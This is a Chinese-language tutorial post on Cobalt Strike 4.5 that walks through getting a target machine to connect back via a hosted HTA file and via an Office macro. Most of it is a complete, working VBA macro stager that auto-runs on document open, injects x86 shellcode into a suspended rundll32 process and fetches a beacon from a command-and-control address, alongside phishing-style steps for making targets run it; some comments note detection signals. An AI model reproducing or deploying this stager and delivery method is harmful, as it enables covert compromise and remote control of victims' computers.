小白学习Cobalt Strike4.5(四)

发表于 2022-8-21 22:15:33
小白学习Cobalt Strike4.5(四)


0x01 HTA文档上线

1、点击攻击,选择生成后门,选择HTA文档
2、点击"选择"按钮选择已创建的监听器，Method（方法）选择 PowerShell。（注：该方式最终由 mshta.exe 拉起 powershell.exe 执行载荷，这一父子进程链是常见的 EDR 告警点。）
3、点击生成,选择要保存的位置,修改一下名字,再点击保存
4、点击攻击,选择Web钓鱼,选择文件托管
5、文件选择刚生成的 ebilaiyou.hta，本地 URL 可随意重命名（本例改为 aiyoumm.exe），点击运行。注意：HTA 本质是 HTML 文本，改名为 .exe 后目标直接双击并不能执行（不是合法的 PE 文件），通常需要保留 .hta 扩展名或通过 mshta.exe 方式触发才会运行。
6、让目标主机访问下面自动生成的地址即可下载该文件；目标运行后即上线。（该地址中的 IP、端口和文件名就是最直接的网络侧 IOC，对应的是上一步 CS "文件托管" 起的 Web 服务。）
http://192.168.0.108:80/download/aiyoumm.exe



7、（原帖此处仅为截图，无文字说明）

0x02 宏上线
1、点击攻击,选择生成后门,选择Office宏
2、选择监听器



3、点击生成

' Mirror of the Win32 PROCESS_INFORMATION struct, filled in by CreateProcessA
' (RunStuff below). Only hProcess is read afterwards, as the injection target.
' All fields are Long (32-bit) even under VBA7/64-bit, i.e. this is the layout
' of the 32-bit struct -- TODO confirm it is adequate on 64-bit Office.
Private Type PROCESS_INFORMATION
    hProcess As Long      ' handle to the spawned (suspended) rundll32.exe
    hThread As Long       ' handle to its primary thread; nothing below resumes it
    dwProcessId As Long
    dwThreadId As Long
End Type

' Mirror of the Win32 STARTUPINFOA struct passed to CreateProcessA. It is
' declared in Auto_Open but never populated (cb and dwFlags stay 0), so the
' child gets default window and standard-handle settings. Field widths follow
' the 32-bit struct; handle fields are Long rather than LongPtr.
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Win32 imports. The Alias clause hides the real API names behind innocuous
' identifiers (CreateStuff / AllocStuff / WriteStuff / RunStuff), but the true
' names still appear verbatim as the Alias strings, so a plain strings pass or
' olevba over the module recovers CreateRemoteThread, VirtualAllocEx,
' WriteProcessMemory and CreateProcessA immediately. The VBA7 branch uses
' PtrSafe/LongPtr for pointer-sized values; handles stay Long in both branches.
#If VBA7 Then
    ' CreateRemoteThread: starts execution of the copied shellcode in the child.
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    ' VirtualAllocEx: commits the RWX region in the child process.
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    ' WriteProcessMemory: copies the shellcode bytes into that region.
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    ' CreateProcessA: spawns the rundll32.exe host process.
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    ' Pre-VBA7 (32-bit only) equivalents of the four imports above. Note the
    ' misspelled lpCurrentDriectory: parameters are positional, so it is harmless.
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

' Entry point of the stock Cobalt Strike VBA stager (this listing is what
' "Attacks > Packages > MS Office Macro" emits). Flow: spawn a 32-bit
' rundll32.exe suspended, allocate an RWX region in it, copy the shellcode in
' one byte at a time, then start a remote thread at that address. Apart from
' the aliased Declare names nothing is obfuscated, so every step below is a
' usable detection signal (Office -> rundll32 with no arguments, remote RWX
' allocation, remote thread creation).
Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO   ' passed zero-filled; cb/dwFlags are never set
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    ' Stager shellcode as signed bytes (-128..127). Decoding them as unsigned
    ' exposes plain ASCII: "wininet" (pushed in two dwords, then resolved by
    ' hash), the URI "/dVPR", a full "User-Agent: Mozilla/5.0 (compatible;
    ' MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; Avant Browser)"
    ' header, and the team server address "192.168.0.108" at the very end.
    ' The prologue (FC E8 .. 60 89 E5 31 D2 64 8B 52 30) is consistent with the
    ' Metasploit-style PEB-walking API-hash resolver, and "104,-72,34,0,0"
    ' looks like push 0x22B8, i.e. port 8888 -- TODO confirm against the
    ' listener. These strings are the cheapest triage / IOC pivots.
    myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,-72,34,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,64,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,100,86,80,82,0,12,-60,67,-37,105,-90,54,-58,62,18,44,-65,-27,89,-39,98,25,-51,116,-100,63,-127,65,-63,-21,87,-64,107,76,65,103,-46, _
66,104,23,40,-10,70,20,-54,-94,-91,101,104,38,-50,-99,46,-79,-6,-71,44,104,-59,29,15,119,112,57,-115,80,14,-63,-114,-52,-53,126,92,-37,96,27,-95, _
-98,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,49,48,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,50,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114, _
105,100,101,110,116,47,54,46,48,59,32,65,118,97,110,116,32,66,114,111,119,115,101,114,41,13,10,0,120,-61,-99,-95,-30,96,54,-82,-81,-31,-24,-124, _
118,24,85,57,84,67,123,17,-101,74,6,13,-71,-54,-61,41,-14,53,40,-93,64,113,-13,-113,-35,-109,102,-119,115,-59,9,50,-42,-70,66,38,-123,110,41,37, _
62,-25,0,-61,60,114,-81,-80,105,118,-7,53,10,-45,-3,35,55,107,-81,-94,-75,5,39,59,-22,33,-92,-126,-86,-82,34,106,65,111,-46,-103,-126,56,-90,77, _
-65,40,47,-38,-115,-30,-43,-62,44,-30,73,-23,-45,120,-92,-125,71,122,-101,-29,123,-49,-17,104,-10,96,-58,-67,31,-86,-40,91,110,86,-67,44,127,-60,-34,-19, _
10,91,124,-115,-110,-82,-48,53,-86,-92,41,21,15,-33,117,85,58,-95,103,120,83,-55,59,1,23,50,-41,-61,53,-115,11,86,-52,-15,28,71,-39,62,52,28, _
62,0,58,103,87,-97,-15,87,-103,-108,18,-18,-55,18,-5,-2,116,-67,-127,-58,-69,97,-128,-28,-78,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,57,50,46,49,54,56,46,48,46,49,48,56,0,0,10,44,42)
    ' Always target the 32-bit rundll32: SysWOW64 on 64-bit Windows
    ' (ProgramW6432 is only defined there), System32 on 32-bit Windows. The
    ' shellcode is x86 (fs:[0x30] PEB access), so the host must be 32-bit.
    ' NOTE(review): VBA string literals have no escape sequences, so "\\" here
    ' is a literal doubled separator. Win32 path handling tolerates it, but it
    ' is most likely a rendering artifact of the post; a single "\" is intended.
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
    Else
        sProc = Environ("windir") & "\\System32\\rundll32.exe"
    End If

    ' CreateProcessA(NULL, rundll32, NULL, NULL, bInheritHandles=1,
    ' dwCreationFlags=4 (CREATE_SUSPENDED), NULL, NULL, sInfo, pInfo).
    ' rundll32.exe started with no arguments by an Office process is anomalous
    ' on its own. The return value is not checked: if the spawn fails,
    ' pInfo.hProcess is 0 and the three calls below fail silently.
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    ' VirtualAllocEx(hProcess, NULL, UBound(myArray), MEM_COMMIT (&H1000),
    ' PAGE_EXECUTE_READWRITE (&H40)). The requested size is UBound, but the
    ' loop below writes LBound..UBound inclusive -- one byte more than asked
    ' for; this only works because the allocation is rounded up to a page.
    ' A remote RWX allocation from an Office process is a high-fidelity alert.
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    ' WriteProcessMemory one byte per call. myByte is a Long, but Length is 1,
    ' so only its low byte is copied -- which is the intended value for the
    ' negative entries as well (two's complement).
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    ' CreateRemoteThread(hProcess, NULL, 0, rwxpage, NULL, 0, NULL). The
    ' suspended primary thread is never resumed (no ResumeThread is declared),
    ' so rundll32 exists purely as a host for this injected thread.
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
  82. Sub AutoOpen()
  83.     Auto_Open
  84. End Sub
  85. Sub Workbook_Open()
  86.     Auto_Open
  87. End Sub

4、新建一个DOC文件,随便命名,然后打开,点击文件后面向下的箭头,选择工具,选择宏,再选择宏
5、宏名随便取，宏的位置选择我们刚创建的这个文件，点击创建

6、将原来的代码删除,然后将上面那些代码复制过去,关闭,重新打开这个doc文件
7、文档现在包含宏，重新打开时会提示是否启用宏，这里点击"启用宏"。注意：Office 默认禁用宏，载荷能否执行完全取决于目标用户是否手动点击"启用内容"。



8、成功上线

工具下载地址：

关注网络安全者公众号，后台回复 CS4.5。（注意：Cobalt Strike 为商业授权软件，非官方渠道流传的版本经常被二次植入后门，请仅在隔离的实验环境中使用并自行校验。）

